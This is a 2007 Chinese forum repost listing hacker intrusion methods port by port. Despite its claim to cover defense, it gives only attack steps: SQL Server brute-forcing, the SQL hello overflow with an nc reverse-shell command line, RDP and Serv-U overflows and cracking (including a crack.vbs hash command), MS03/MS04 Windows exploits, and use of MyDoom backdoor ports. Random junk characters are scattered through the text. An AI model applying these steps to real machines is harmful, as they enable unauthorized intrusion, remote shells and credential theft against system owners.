|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 4 w2 a. \1 M7 V* F
6 v# ^1 t& K8 {4 i
m' D1 i: K2 x r: D: D. V$ H
1. 1433端口入侵 5 |/ X; [/ C& J M5 T' F; s, Q
7 O+ j) r7 N4 B4 B: Q# f! Y scanport.exe 查有1433的机器 ~& a& |7 x0 [& x- N9 s
0 {5 V1 N$ u: l! m7 v4 V: x. L SQLScanPass.exe 进行字典暴破(字典是关键)
+ {0 k; Z& h' R; W4 Y# G; {, g( Z# A& }3 s8 ]1 V1 P8 L) M% w
最后 SQLTools.exe入侵 . ]2 u, g1 L+ D4 W. V
1 V% I% H4 Y9 E- N" l* ?
============================= # A! L! l8 X0 T7 }
Y) E `9 t' d: d
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
" U6 v1 L0 J$ Y+ ^ p+ f$ O" P t6 e- F6 ~3 X
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
) ^# \9 B( P9 M( [7 K; S/ w
3 e7 o# \$ T& _ w+ q' ] (以上反向的,测试成功)
) e: o9 A- k$ O% A% G1 s) g p6 `* b a; I8 `0 G# r
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
9 D1 w9 g8 ?8 z, ]" C4 v0 \
: b! f; b# z/ Q 2. 4899端口入侵 3 ~6 M) ^6 ?# V9 ^( l# O
5 Q1 d* {0 |4 b( Z4 j1 D M5 q' h 用4899过滤器.exe,扫描空口令的机器
# e4 f# I$ _, n# F
! }9 w& R. k3 E2 f' w, b' w 3. 3899的入侵
8 g( h; p: [ u5 j+ l& l5 b2 C( w2 z
对很早的机器,可以试试3389的溢出(win3389ex.exe)
! f& y: ?- d% U- s' [2 m
% T6 W$ {% G& I0 A; K 对2000的机器,可以试试字典暴破。(tscrack.exe) " s& v2 R8 R% A0 d* _
: I* P3 U. ]) @+ x7 k& H" A1 f! p 4. 80入侵 4 {" n/ x- L8 f* Q8 A
0 Z, \. T5 z/ F) L8 F
对sp3以前的机器,可以用webdav入侵;
2 \! ?* ~ S1 b
( e4 [1 P8 g4 F7 X8 z! j- r( A7 W 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) $ m4 ^3 f2 ?. H! i5 P
( n; w% o; J- r. q: U# X
可以利用SQL进行注入。(小榕的注入软件)。 7 t( h! u( S- I' Y! O. p
" y+ _8 Q+ T; }" D( x
5. serv-u入侵(21端口)
8 i7 c* ~) _; E% N# {3 u& Z! R- y8 B' [: U6 c
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
& L2 p( `: |' e6 t
* I0 U7 C1 I6 a 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) . E1 B0 n( V0 G1 v- y4 v
( I: X( V' @- s6 z- ?$ M) x ====================================== ! m. o, v1 x- v8 ?, n
3 j' T( _4 u' S% s 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
% ~+ O" u/ n1 u: q( q- p. M; V6 I. ?6 c. _
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
+ r, t# E2 f5 \$ D& Q y
3 U$ Z, b0 b: G, L8 G% L 6. 554端口
! T( |' c/ B2 r B% K7 ?- M, ?
0 y3 w1 l9 y7 ^* e- R1 W 用real554.exe入侵。
. T. S" g$ F( [( M: A) W
, y: K" j r s& a 7. 6129端口
$ _- E( B7 S, F7 y# n0 C+ t" N D9 j& {
用DameWare6129.exe入侵。 & h8 y; q$ n5 j2 I9 C- B, q8 x
1 x/ x8 B, a9 e, P' b3 z0 o! P 8. 系统漏洞
P: g8 |! {+ A4 h$ R* y+ Q8 G% R i
{5 O2 r6 a5 X* O$ K 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, " s' q. F2 G4 r" D$ n
: c U: U; s4 D0 W 进行溢出入侵。
7 p) q: [0 J: s" r( _% |) S7 k2 N
/ p6 J! W5 y* c: V1 f0 I 9. 3127等端口
9 I( M6 ~, y( N
2 ^$ J. B. S+ C/ T6 D. D 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 & e3 ~+ V5 O X" a5 N* Q
3 l T/ m" F' h$ d 10. 其他入侵 4 d) @7 w. j' y$ f" ]0 K
0 }! n- p1 N0 P' G: ]7 a 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
- S* w7 U4 L6 t' U/ m
0 ~' a/ e- L% ^* L1 z( g7 H| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
